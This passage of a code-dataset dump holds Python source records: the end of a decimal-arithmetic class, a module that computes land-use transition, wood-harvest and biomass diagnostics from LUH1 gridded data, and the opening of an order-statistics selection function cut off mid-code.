and, optionally, thousands separators.\n # It is useful to limit the number to the length of a calculator's LCD display, for example.\n # If the number does not fit, it returns \"Overflow\".\n def to_string_max_length(self, max_length: int, thousands: bool = False) -> str:\n if 
max_length < 8:\n max_length = 8\n\n str_number: str = self.__str__(thousands)\n # 1,234,567,890.1234567\n # If the number of characters before '.' is greater than max_length --> Overflow\n pos_point: int = str_number.find('.')\n if pos_point == -1: # No decimals\n pos_point = len(str_number)\n if pos_point > max_length:\n return \"Overflow\"\n else:\n str_number = str_number[:max_length]\n # If there are decimals, we can eliminate trailing zeros\n pos_point: int = str_number.find('.')\n if pos_point != -1:\n # 123.34000\n while str_number[-1:] == '0':\n str_number = str_number[:-1]\n # If the last character is a point, it can be deleted\n if str_number[-1:] == '.':\n str_number = str_number[:-1]\n if str_number == \"-0\":\n str_number = \"0\"\n return str_number\n\n def _eliminate_decimal_trailing_zeros(self) -> None:\n while self._num_decimals > 0 and (self._number % 10) == 0:\n self._number //= 10\n self._num_decimals -= 1\n\n def _reduce_to_scale(self) -> None:\n if self._num_decimals > DecimalNumber.get_scale():\n # Round half to even: https://en.wikipedia.org/wiki/Rounding#Round_half_to_even\n\n # Example:\n # scale = 3\n # Number: 123.456789\n # n = 123456789, decimals = 6\n # It should be 123.457 ; n = 123457, decimals = scale = 3\n\n n: int = self._number\n s: int = self._num_decimals - DecimalNumber.get_scale() # s: 6 - 3 = 3\n ds: int = (10 ** s)\n\n v: int = n % (ds * 10) # v: n % 10**4 = 6789 1000\n b: int = v % ds # b: v % 10**3 = 789\n a: int = v // ds # a: v // 10**3 = 6\n m: int = ds // 2 # m: 10**3 // 2 = 500 (to be compared to b)\n\n if (a % 2) == 1: # Calculating differences to get to the nearest even\n if b < m:\n x: int = -b\n else:\n x: int = ds - b\n else:\n if b <= m:\n x: int = -b\n else:\n x: int = ds - b\n\n self._number = (n + x) // ds\n self._num_decimals = DecimalNumber.get_scale()\n\n self._eliminate_decimal_trailing_zeros()\n\n if self._number == 0 and not self._is_positive: # Prevents -0\n self._is_positive = True\n\n\nclass DecimalNumberException(Exception):\n pass\n\n\nclass DecimalNumberExceptionParseError(DecimalNumberException):\n def __init__(self, *args: object) -> None:\n if args:\n self.message = args[0]\n else:\n self.message = None\n\n def __str__(self) -> str:\n if self.message:\n return \"DecimalNumberExceptionParseError: {0}\".format(self.message)\n else:\n return \"DecimalNumberExceptionParseError\"\n\n\nclass DecimalNumberExceptionBadInit(DecimalNumberException):\n def __init__(self, *args: object) -> None:\n if args:\n self.message = args[0]\n else:\n self.message = None\n\n def __str__(self) -> str:\n if self.message:\n return \"DecimalNumberExceptionBadInit: {0}\".format(self.message)\n else:\n return \"DecimalNumberExceptionBadInit\"\n\n\nclass DecimalNumberExceptionMathDomainError(DecimalNumberException):\n def __init__(self, *args: object) -> None:\n if args:\n self.message = args[0]\n else:\n self.message = None\n\n def __str__(self) -> str:\n if self.message:\n return \"DecimalNumberExceptionMathDomainError: {0}\".format(self.message)\n else:\n return \"DecimalNumberExceptionMathDomainError\"\n\n\nclass DecimalNumberExceptionDivisionByZeroError(DecimalNumberException):\n def __init__(self, *args: object) -> None:\n if args:\n self.message = args[0]\n else:\n self.message = None\n\n def __str__(self) -> str:\n if self.message:\n return \"DecimalNumberExceptionDivisionByZeroError: {0}\".format(self.message)\n else:\n return \"DecimalNumberExceptionDivisionByZeroError\"\n\n\nif __name__ == \"__main__\":\n print(\"DecimalNumber module 
-\", DecimalNumber.VERSION)\n","sub_path":"mpy_decimal/mpy_decimal.py","file_name":"mpy_decimal.py","file_ext":"py","file_size_in_byte":38666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"585520985","text":"import logging\nimport os\nimport pdb\n\nfrom enum import Enum\nfrom tqdm import tqdm\nimport numpy as np\nimport pandas as pd\n\nimport constants\nimport pygeoutil.util as util\n\n\nRES_LUH1 = 0.5\n\nclass LU(Enum):\n \"\"\"\n Land-use types (main).\n \"\"\"\n __order__ = 'gothr gsecd gurbn gcrop gpast gssma gssmb gvbh1 gvbh2 gsbh1 gsbh2 gsbh3 all'\n gothr, gsecd, gurbn, gcrop, gpast, gssma, gssmb, gvbh1, gvbh2, gsbh1, gsbh2, gsbh3, all = range(13)\n\n\ndef add_to_list(arr, start_yr, end_yr):\n \"\"\"\n\n Args:\n arr:\n start_yr:\n end_yr:\n\n Returns:\n\n \"\"\"\n # TODO: Make more robust, years hard coded in right now\n new_arr = []\n for yr in range(850, start_yr):\n new_arr.extend([np.nan])\n\n new_arr.extend(arr)\n\n for yr in range(end_yr, 2015):\n new_arr.extend([np.nan])\n\n return new_arr\n\n\ndef get_lu_array(lu_type, year, name_LUH1='LUHa_u2.v1', subset_arr=None):\n \"\"\"\n Get array of LU category\n :param lu_type:\n :param year:\n :param subset_arr:\n :return:\n \"\"\"\n try:\n arr = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/' + lu_type.name + '.'\n + str(int(year)) + '.txt', skiprows=6)\n\n arr_subset = util.extract_from_ascii(arr, res=RES_LUH1, subset_arr=subset_arr)\n except:\n arr_subset = np.nan\n\n return arr_subset\n\n\ndef get_lu_area(lu_type, year, subset_arr=None):\n \"\"\"\n\n Args:\n lu_type:\n year:\n subset_arr:\n\n Returns:\n\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n\n return np.ma.sum(get_lu_array(lu_type, year, subset_arr=subset_arr) * carea)\n\n\ndef get_lu_area_ts(lu_type, years, name_LUH1='LUHa_u2.v1', subset_arr=None):\n \"\"\"\n Get land use area for a land use state for user specified years\n Args:\n lu_type:\n years:\n subset_arr:\n\n Returns:\n a list of areas\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n areas_lu = []\n\n for year in years:\n areas_lu.append(np.ma.sum(get_lu_array(lu_type, year, name_LUH1=name_LUH1, subset_arr=subset_arr) * carea))\n\n return areas_lu\n\n\ndef return_transition_name(name_state):\n \"\"\"\n E.g. 
return 'c' for state 'crop'\n Args:\n name_state:\n\n Returns:\n\n \"\"\"\n if name_state == 'crop':\n return 'c'\n elif name_state == 'pasture':\n return 'p'\n elif name_state == 'urban':\n return 'u'\n elif name_state == 'secondary':\n return 's'\n elif name_state == 'primary':\n return 'v'\n else:\n print('State: ' + name_state + ' does not exist')\n\n\ndef get_name_state_from_LUH1_enum(name_LUH1_state):\n \"\"\"\n Return English name based on LUH1 enum name\n Args:\n name_LUH1_state:\n\n Returns:\n\n \"\"\"\n if name_LUH1_state == LU.gcrop:\n return 'crop'\n elif name_LUH1_state == LU.gpast:\n return 'pasture'\n elif name_LUH1_state == LU.gurbn:\n return 'urban'\n elif name_LUH1_state == LU.gsecd:\n return 'secondary'\n elif name_LUH1_state == LU.gothr:\n return 'primary'\n else:\n print('State: ' + name_LUH1_state + ' does not exist')\n\n\ndef get_transition(source, target, year, name_LUH1='LUHa_u2.v1', subset_arr=None):\n \"\"\"\n Return the source-to-target transition fraction array for a given year\n Args:\n source:\n target:\n year:\n subset_arr:\n\n Returns:\n\n \"\"\"\n src_lus = return_transition_name(source)\n tgt_lus = return_transition_name(target)\n\n # Return np.nan if either source == target or target == primary\n if source == target or target == 'primary':\n return np.nan\n\n arr = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gfl' + src_lus +\n tgt_lus + '.' + str(year) + '.txt', skiprows=6)\n\n arr_trans = util.extract_from_ascii(arr, res=RES_LUH1, subset_arr=subset_arr)\n\n return arr_trans\n\n\ndef get_transitions_into_state(source, year, name_LUH1='LUHa_u2.v1', subset_arr=None):\n \"\"\"\n Sum up all transitions INTO source\n Args:\n source:\n year:\n name_LUH1:\n subset_arr:\n\n Returns:\n\n \"\"\"\n list_targets = ['crop', 'pasture', 'urban', 'secondary', 'primary']\n arr_trans = np.zeros_like(util.open_or_die(constants.CELL_AREA_H))\n\n for tgt in list_targets:\n arr_trans = arr_trans + get_transition(tgt, source, year, name_LUH1, subset_arr)\n\n return arr_trans\n\n\ndef get_transitions_from_state(source, year, name_LUH1='LUHa_u2.v1', subset_arr=None):\n \"\"\"\n Sum up all transitions OUT of source\n Args:\n source:\n year:\n name_LUH1:\n subset_arr:\n\n Returns:\n\n \"\"\"\n list_targets = ['crop', 'pasture', 'urban', 'secondary']\n arr_trans = np.zeros_like(util.open_or_die(constants.CELL_AREA_H))\n\n for tgt in list_targets:\n arr_trans = arr_trans + get_transition(source, tgt, year, name_LUH1, subset_arr)\n\n return arr_trans\n\n\ndef wood_clearing_for_ag(years, subset_arr=None):\n \"\"\"\n For each grid-cell this is the sum of transitions from primary to cropland and pasture, multiplied by the cell\n area and the potential biomass density PLUS the sum of transitions from secondary to cropland and pasture,\n multiplied by the cell area and secondary mean biomass density. 
To get a global total, sum over all grid-cells.\n Args:\n years:\n subset_arr:\n\n Returns:\n\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n\n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba * (vba > 0.01) + (vba < 0.01) * 0.01 # Set least value of vba to 0.01\n\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n\n sum_wc_ag = 0.0\n wc_ag = []\n for yr in tqdm(years, desc='LUH1_wood_clearing_for_ag', disable=(len(years) < 2)):\n # 2d array showing area of land transitioning from primary land to pasture and cropland\n primary_to_pasture = get_transition('primary', 'pasture', year=yr, subset_arr=subset_arr)\n primary_to_cropland = get_transition('primary', 'crop', year=yr, subset_arr=subset_arr)\n\n # 2d array showing area of land transitioning from secondary land to pasture and cropland\n scnd_to_pasture = get_transition('secondary', 'pasture', year=yr, subset_arr=subset_arr)\n scnd_to_cropland = get_transition('secondary', 'crop', year=yr, subset_arr=subset_arr)\n\n val = np.ma.sum(((primary_to_pasture + primary_to_cropland) * vba +\n (scnd_to_pasture + scnd_to_cropland) * get_lu_array(LU.gssmb, year=yr,\n subset_arr=subset_arr)) * fnf * carea)\n\n sum_wc_ag += val\n wc_ag.extend([val])\n\n return sum_wc_ag, wc_ag\n\n\ndef compute_wh(years, subset_arr=None):\n \"\"\"\n Compute wood harvesting (time-series of wood-harvest biomass, Pg C)\n Args:\n years:\n subset_arr:\n\n Returns:\n time-series of wood-harvest biomass (Pg C), one value per year\n\n \"\"\"\n ts_wh = []\n for yr in years:\n # wood harvest biomass from primary forest\n primf_bioh = get_lu_array(LU.gvbh1, year=yr, subset_arr=subset_arr)\n\n # wood harvest biomass from primary non-forest\n primn_bioh = get_lu_array(LU.gvbh2, year=yr, subset_arr=subset_arr)\n\n # wood harvest biomass from secondary mature forest\n secmf_bioh = get_lu_array(LU.gsbh1, year=yr, subset_arr=subset_arr)\n\n # wood harvest biomass from secondary young forest\n secyf_bioh = get_lu_array(LU.gsbh2, year=yr, subset_arr=subset_arr)\n\n # wood harvest biomass from secondary non-forest\n secnf_bioh = get_lu_array(LU.gsbh3, year=yr, subset_arr=subset_arr)\n\n val = np.ma.sum(primf_bioh + primn_bioh + secmf_bioh + secnf_bioh + secyf_bioh) * constants.KG_TO_PG\n\n ts_wh.extend([val])\n\n return ts_wh\n\n\ndef human_impact_land(years, subset_arr=None):\n \"\"\"\n\n :param years:\n :param subset_arr:\n :return:\n \"\"\"\n\n area_global = 0.0\n area_impacted_human = 0.0\n\n for yr in years:\n # Get the ascii array\n othr = get_lu_array(LU.gothr, year=yr, subset_arr=subset_arr)\n secd = get_lu_array(LU.gsecd, year=yr, subset_arr=subset_arr)\n urbn = get_lu_array(LU.gurbn, year=yr, subset_arr=subset_arr)\n past = get_lu_array(LU.gpast, year=yr, subset_arr=subset_arr)\n crop = get_lu_array(LU.gcrop, year=yr, subset_arr=subset_arr)\n\n area_global += np.ma.sum(othr + secd + urbn + past + crop)\n\n area_impacted_human += np.ma.sum(crop + past + secd + urbn)\n\n return (area_impacted_human * 100.0) / area_global\n\n\ndef get_glm_scnd_area(yr, subset_arr=None):\n \"\"\"\n\n Args:\n yr:\n subset_arr:\n\n Returns:\n\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n\n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg 
* 0.75 # Get above ground biomass\n vba = vba * (vba > 0.01) + (vba < 0.01) * 0.01 # Set least value of vba to 0.01\n\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n\n # Get the ascii array\n secd = get_lu_array(LU.gsecd, year=yr, subset_arr=subset_arr)\n\n scnd_area = np.ma.sum(secd * carea)\n scnd_frst_area = np.ma.sum(secd * fnf * carea)\n scnd_non_frst_area = scnd_area - scnd_frst_area\n\n return scnd_area, scnd_frst_area, scnd_non_frst_area\n\n\ndef get_glm_forest_area(yr, subset_arr=None):\n \"\"\"\n Return forest area (secd + othr) for given year\n :param yr:\n :param subset_arr:\n :return:\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n\n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba * (vba > 0.01) + (vba < 0.01) * 0.01 # Set least value of vba to 0.01\n\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n\n # Get the ascii array\n othr = get_lu_array(LU.gothr, year=yr, subset_arr=subset_arr)\n secd = get_lu_array(LU.gsecd, year=yr, subset_arr=subset_arr)\n\n # forest area\n return np.ma.sum((secd + othr) * carea * fnf)\n\n\ndef ag_land_in_sc_LUH1(years, subset_arr=None):\n \"\"\"\n\n :param years:\n :param subset_arr:\n :return:\n \"\"\"\n area_ag_to_sc = 0.0\n\n # Butler map is constant throughout time\n carea = util.open_or_die(constants.CELL_AREA_H)\n\n # Get ascii file corresponding to Butler map and convert to correct resolution i.e from quarter deg to half deg\n arr_sc = util.open_or_die(constants.ASC_HALF_DEG_BUTLER)\n\n for yr in years:\n # Get ascii file corresponding to crop and subset if needed\n past = get_lu_array(LU.gpast, year=yr, subset_arr=subset_arr)\n crop = get_lu_array(LU.gcrop, year=yr, subset_arr=subset_arr)\n\n area_ag_to_sc += np.ma.sum(arr_sc * (crop + past) * carea)\n\n return area_ag_to_sc/15.0\n\n\ndef per_scnd_increase_forest(init_year=1700, end_yr=2000, subset_arr=None):\n \"\"\"\n % of secondary land increase that is forested (1700 - 2000)\n Args:\n init_year:\n end_yr:\n subset_arr:\n\n Returns:\n\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba * (vba > 0.01) + (vba < 0.01) * 0.01 # Set least value of vba to 0.01\n\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n\n forested_scnd_end = np.ma.sum(get_lu_array(LU.gsecd, year=end_yr, subset_arr=subset_arr) * carea * fnf)\n forested_scnd_init = np.ma.sum(get_lu_array(LU.gsecd, year=init_year, subset_arr=subset_arr) * carea * fnf)\n\n scnd_end = get_lu_area(LU.gsecd, end_yr, subset_arr=subset_arr)\n scnd_init = get_lu_area(LU.gsecd, init_year, subset_arr=subset_arr)\n\n per_increase_forested_scnd = (forested_scnd_end - forested_scnd_init) * 100. 
/ (scnd_end - scnd_init)\n\n return per_increase_forested_scnd\n\n\ndef get_MLU_LUH1_agb(subset_arr=None, do_forest=True):\n \"\"\"\n Returns potential AGB on FOREST areas\n Args:\n subset_arr:\n do_forest:\n\n Returns:\n\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n\n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba * (vba > 0.01) + (vba < 0.01) * 0.01 # Set least value of vba to 0.01\n\n if do_forest:\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n else:\n fnf = 1.0\n\n if subset_arr is not None:\n return np.ma.sum(vba * carea * fnf * subset_arr)\n else:\n return np.ma.sum(vba * carea * fnf)\n\n\ndef get_LUH1_biomass(years, only_forest=True, ulat=90.0, llat=-90.0, llon=-180.0, rlon=180.0, name_LUH1='LUHa_u2.v1',\n subset_arr=None):\n \"\"\"\n\n Args:\n years:\n only_forest:\n ulat:\n llat:\n llon:\n rlon:\n subset_arr:\n\n Returns:\n\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n if subset_arr is not None:\n carea = carea * subset_arr\n \n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba*(vba > 0.01) + (vba < 0.01)*0.01 # Set least value of vba to 0.01\n\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n\n sum_biom = 0.0\n # Spatially subset carea, fnf and vba\n carea = util.extract_from_ascii(carea, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n vba = util.extract_from_ascii(vba, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1, subset_arr=subset_arr)\n fnf = util.extract_from_ascii(fnf, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1, subset_arr=subset_arr)\n\n for yr in years:\n # Get the ascii array\n arr_ssmb = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gssmb.' +\n str(yr) + '.txt', skiprows=6)\n arr_othr = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gothr.' +\n str(yr) + '.txt', skiprows=6)\n arr_secd = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gsecd.' 
+\n str(yr) + '.txt', skiprows=6)\n # Subset by lat lon boundary\n ssmb = util.extract_from_ascii(arr_ssmb, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n othr = util.extract_from_ascii(arr_othr, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n secd = util.extract_from_ascii(arr_secd, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n\n # Secondary biomass = secondary * cell_area * secondary biomass density\n if not only_forest:\n secdf_biom = np.ma.sum(secd * carea * ssmb)\n else:\n secdf_biom = np.ma.sum(secd * carea * fnf * ssmb)\n\n # Primary biomass = primary * cell_area * primary biomass density\n if not only_forest:\n primf_biom = np.ma.sum(othr * carea * vba)\n else:\n primf_biom = np.ma.sum(othr * carea * fnf * vba)\n\n sum_biom += primf_biom + secdf_biom\n\n return sum_biom\n\n\ndef get_cumulative_emissions(start_yr, end_yr, ulat=90.0, llat=-90.0, llon=-180.0, rlon=180.0, name_LUH1='LUHa_u2.v1',\n subset_arr=None):\n \"\"\"\n Cumulative emissions are computed as the difference between potential or near-potential biomass in start_yr and\n biomass in the current year (end_yr).\n It is a NET quantity, since we only take emissions into account and NOT regrowth.\n Args:\n start_yr:\n end_yr:\n ulat:\n llat:\n llon:\n rlon:\n subset_arr:\n\n Returns:\n\n \"\"\"\n list_tot_biom = []\n\n carea = util.open_or_die(constants.CELL_AREA_H)\n if subset_arr is not None: # a bare truthiness test on a numpy array raises ValueError\n carea = carea * subset_arr\n\n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba * (vba > 0.01) + (vba < 0.01) * 0.01 # Set least value of vba to 0.01\n\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n\n # Spatially subset carea, fnf and vba\n carea = util.extract_from_ascii(carea, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n vba = util.extract_from_ascii(vba, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1, subset_arr=subset_arr)\n fnf = util.extract_from_ascii(fnf, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1, subset_arr=subset_arr)\n\n for idx, yr in enumerate([start_yr, end_yr]):\n # Get the ascii array\n arr_ssmb = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gssmb.' +\n str(yr) + '.txt', skiprows=6)\n arr_othr = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gothr.' +\n str(yr) + '.txt', skiprows=6)\n arr_secd = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gsecd.' 
+\n str(yr) + '.txt', skiprows=6)\n\n # Subset by lat lon boundary\n ssmb = util.extract_from_ascii(arr_ssmb, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n othr = util.extract_from_ascii(arr_othr, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n secd = util.extract_from_ascii(arr_secd, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n\n # Secondary biomass = secondary * cell_area * secondary biomass density\n secdf_biom = np.ma.sum(secd * carea * ssmb)\n\n # Primary biomass = primary * cell_area * primary biomass density\n primf_biom = np.ma.sum(othr * carea * vba)\n\n # Add secondary and primary biomass\n list_tot_biom.append(np.ma.sum(secdf_biom + primf_biom))\n\n # Compute difference in biomass\n cum_emissions = list_tot_biom[1] - list_tot_biom[0]\n\n return cum_emissions\n\n\ndef get_LUH1_secma(do_forest=True, yr=2005, name_LUH1='LUHa_u2.v1', subset_arr=None):\n \"\"\"\n\n Args:\n do_forest:\n yr:\n subset_arr:\n\n Returns:\n\n \"\"\"\n ssma = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gssma.' + str(yr) +\n '.txt', skiprows=6)\n\n # Subset by forest/non-forest map\n if do_forest:\n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba * (vba > 0.01) + (vba < 0.01) * 0.01 # Set least value of vba to 0.01\n\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n\n ssma = np.ma.masked_where(fnf <= 0.0, ssma)\n\n return ssma\n\n\ndef diag_LUH1(start_yr=1500, end_yr=2005, do_extend=True, name_LUH1='LUHa_u2.v1'):\n \"\"\"\n gflcp : fraction of each gridcell that transitioned from cropland to pasture\n gflcs : fraction of each gridcell that transitioned from cropland to secondary land\n gflcu : fraction of each gridcell that transitioned from cropland to urban land - for LUHa_u2.v1\n gflpc : fraction of each gridcell that transitioned from pasture to cropland\n gflps : fraction of each gridcell that transitioned from pasture to secondary land\n gflpu : fraction of each gridcell that transitioned from pasture to urban land - for LUHa_u2.v1\n gflsc : fraction of each gridcell that transitioned from secondary land to cropland\n gflsp : fraction of each gridcell that transitioned from secondary land to pasture\n gflsu : fraction of each gridcell that transitioned from secondary land to urban land - for LUHa_u2.v1\n gfluc : fraction of each gridcell that transitioned from urban land to cropland - for LUHa_u2.v1\n gflup : fraction of each gridcell that transitioned from urban land to pasture - for LUHa_u2.v1\n gflus : fraction of each gridcell that transitioned from urban land to secondary land - for LUHa_u2.v1\n gflvc : fraction of each gridcell that transitioned from primary land to cropland\n gflvp : fraction of each gridcell that transitioned from primary land to pasture\n gflvu : fraction of each gridcell that transitioned from primary land to urban land - for LUHa_u2.v1\n gfsh1 : fraction of each gridcell that had wood harvested from mature secondary forested land\n gfsh2 : fraction of each gridcell that had wood harvested from young secondary forested land\n gfsh3 : fraction of each gridcell that had wood harvested from secondary non-forested land\n gfvh1 : fraction of each gridcell that had wood harvested from primary forested land\n gfvh2 : fraction 
of each gridcell that had wood harvested from primary non-forested land\n Args:\n start_yr:\n end_yr:\n do_extend:\n\n Returns:\n\n \"\"\"\n path_base = constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/'\n carea = util.open_or_die(constants.CELL_AREA_H)\n halfdeg = util.open_or_die(constants.input_dir + os.sep + '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba*(vba > 0.01) + (vba < 0.01)*0.01 # Set least value of vba to 0.01\n\n icew = util.open_or_die(constants.input_dir + os.sep + '/gicew.1700.txt', skiprows=6)\n\n cum_net_C = []\n gross_trans = []\n net_trans = []\n sec_area = []\n sec_age = []\n wh = []\n global_biom = vba * (1 - icew) * carea\n\n for yr in tqdm(range(start_yr, end_yr), desc='diag_LUH1'):\n secd = abs(util.open_or_die(path_base + 'gsecd.' + str(yr) + '.txt', skiprows=6))\n ssmb = abs(util.open_or_die(path_base + 'gssmb.' + str(yr) + '.txt', skiprows=6))\n ssma = abs(util.open_or_die(path_base + 'gssma.' + str(yr) + '.txt', skiprows=6))\n othr = abs(util.open_or_die(path_base + 'gothr.' + str(yr) + '.txt', skiprows=6))\n crop = abs(util.open_or_die(path_base + 'gcrop.' + str(yr) + '.txt', skiprows=6))\n past = abs(util.open_or_die(path_base + 'gpast.' + str(yr) + '.txt', skiprows=6))\n flcp = abs(util.open_or_die(path_base + 'gflcp.' + str(yr) + '.txt', skiprows=6))\n flpc = abs(util.open_or_die(path_base + 'gflpc.' + str(yr) + '.txt', skiprows=6))\n flsp = abs(util.open_or_die(path_base + 'gflsp.' + str(yr) + '.txt', skiprows=6))\n flps = abs(util.open_or_die(path_base + 'gflps.' + str(yr) + '.txt', skiprows=6))\n flsc = abs(util.open_or_die(path_base + 'gflsc.' + str(yr) + '.txt', skiprows=6))\n flcs = abs(util.open_or_die(path_base + 'gflcs.' + str(yr) + '.txt', skiprows=6))\n flvc = abs(util.open_or_die(path_base + 'gflvc.' + str(yr) + '.txt', skiprows=6))\n flvp = abs(util.open_or_die(path_base + 'gflvp.' + str(yr) + '.txt', skiprows=6))\n fvh1 = abs(util.open_or_die(path_base + 'gfvh1.' + str(yr) + '.txt', skiprows=6))\n fvh2 = abs(util.open_or_die(path_base + 'gfvh2.' + str(yr) + '.txt', skiprows=6))\n fsh1 = abs(util.open_or_die(path_base + 'gfsh1.' + str(yr) + '.txt', skiprows=6))\n fsh2 = abs(util.open_or_die(path_base + 'gfsh2.' + str(yr) + '.txt', skiprows=6))\n fsh3 = abs(util.open_or_die(path_base + 'gfsh3.' 
+ str(yr) + '.txt', skiprows=6))\n\n to_cp = flsp + flsc + flvc + flvp # primary/secondary to cropland/pasture\n to_sc = flps + flcs # cropland/pasture to secondary\n fvhb = fvh1 + fvh2 # wood harvested from primary forested/non-forested land\n fshb = fsh1 + fsh2 + fsh3 # wood harvested from secondary mature/young forested and non-forested land\n\n cum_net_C.append(np.ma.sum(np.ma.sum(global_biom)) * 1e6 * 1e3 / 1e15 -\n np.ma.sum(np.ma.sum(secd * carea * ssmb + othr * carea * vba)) * 1e6 * 1e3 / 1e15)\n gross_trans.append(np.ma.sum(np.ma.sum((to_cp + to_sc + flcp + flpc + fvhb + fshb) * carea)))\n net_trans.append(np.ma.sum(np.ma.sum((to_cp - to_sc + fvhb) * carea)))\n sec_area.append(np.ma.sum(np.ma.sum(secd * carea)))\n sec_age.append(np.ma.sum(np.ma.sum(secd * ssma * carea))/np.ma.sum(np.ma.sum((secd + 1e-12) * carea))) # use masked sums in the denominator too\n wh.append(np.ma.sum((fvhb + fshb) * carea)) # area-weight before summing so a scalar is stored\n\n if do_extend:\n cum_net_C = add_to_list(cum_net_C, start_yr, end_yr)\n gross_trans = add_to_list(gross_trans, start_yr, end_yr)\n net_trans = add_to_list(net_trans, start_yr, end_yr)\n sec_area = add_to_list(sec_area, start_yr, end_yr)\n sec_age = add_to_list(sec_age, start_yr, end_yr)\n wh = add_to_list(wh, start_yr, end_yr)\n\n return cum_net_C, gross_trans, net_trans, sec_area, sec_age, wh\n\nif __name__ == '__main__':\n pass\n","sub_path":"GLM/process_luh1.py","file_name":"process_luh1.py","file_ext":"py","file_size_in_byte":26427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"526850639","text":"from random import randint\nfrom partitions import hoare_partition\nfrom math import ceil\n\ndef get_order_statistics(list, start, end, order):\n while start < end:\n pivot_value = get_pivot_by_five(list, start, end)\n pivot = hoare_partition(list, start, end, pivot_value)\n if pivot - start > order - 1:\n return get_order_statistics(list, start, pivot - 1, order)\n else:\n order -= pivot - start\n start = pivot\n if order == 1:\n return 